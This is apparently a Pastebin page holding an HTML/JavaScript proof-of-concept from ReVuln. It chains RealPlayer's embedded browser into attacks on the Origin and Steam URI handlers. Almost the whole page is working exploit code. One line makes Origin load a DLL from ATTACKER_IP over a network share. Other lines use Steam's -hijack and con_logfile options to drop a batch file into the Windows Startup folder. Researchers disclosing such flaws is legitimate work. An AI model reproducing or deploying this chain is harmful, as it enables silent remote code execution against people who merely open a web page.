Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <body>
- <object
- id="test"
- type="application/vnd.rn-realplayer-javascript"
- width="0" height="0">
- </object>
- <script type="text/javascript">
- // Credits:
- // ReVuln
- // revuln.com
- // twitter.com/revuln
- // The embedded browser available in RealPlayer allows to open any
- // registered URI without prompting the user, just like Safari does.
- // We can use it to improve the triggers for both Steam and Origin vulnerabilities
- var check_if_rp = '#rp';
- if(document.location.href.indexOf(check_if_rp) < 0) {
- // browser
- document.write("BROWSER");
- var test = document.getElementById('test');
- // open the RealPlayer browser
- test.OpenURLInPlayerBrowser(
- document.location.href + check_if_rp
- );
- } else {
- // RealPlayer
- document.write("REALPLAYER");
- // Origin vulnerability
- // http://revuln.com/files/ReVuln_EA_Origin_Insecurity.pdf
- // exploit the openautomate option of Crysis 3 and 2,
- // Battlefield 3 and others like RE5 and DMC4
- var crysis = '71503,71505,71645,71656,71708,71709,71710,71711,71779,1003897,1003898,1004521';
- var bf3 = '70619,71067,71171,71633,1000689';
- var others = '71604,71606,71716,71613,1004689';
- window.location =
- 'origin://LaunchGame/'
- + crysis
- + ',' + bf3
- + ',' + others
- + '?CommandParams= -openautomate \\\\ATTACKER_IP\\evil.dll';
- // Steam vulnerability... yes, Steam IS still vulnerable
- // http://revuln.com/files/ReVuln_Steam_Browser_Protocol_Insecurity.pdf
- // the following is the "original" PoC used in our video and shown at
- // BlackHat Europe 2013
- function do1() {
- window.location='steam://run/440// -hijack -dev';
- }
- function do2() {
- window.location='steam://run/440// -hijack %2bcon_logfile "%5cDocuments and Settings%5cAdministrator%5cStart Menu%5cPrograms%5cStartup%5cx.bat"';
- }
- function do3() {
- window.location='steam://run/440// -hijack %2becho calc %2bquit';
- }
- setTimeout("do1()", 0);
- setTimeout("do2()", 20000);
- setTimeout("do3()", 22000);
- }
- </script>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement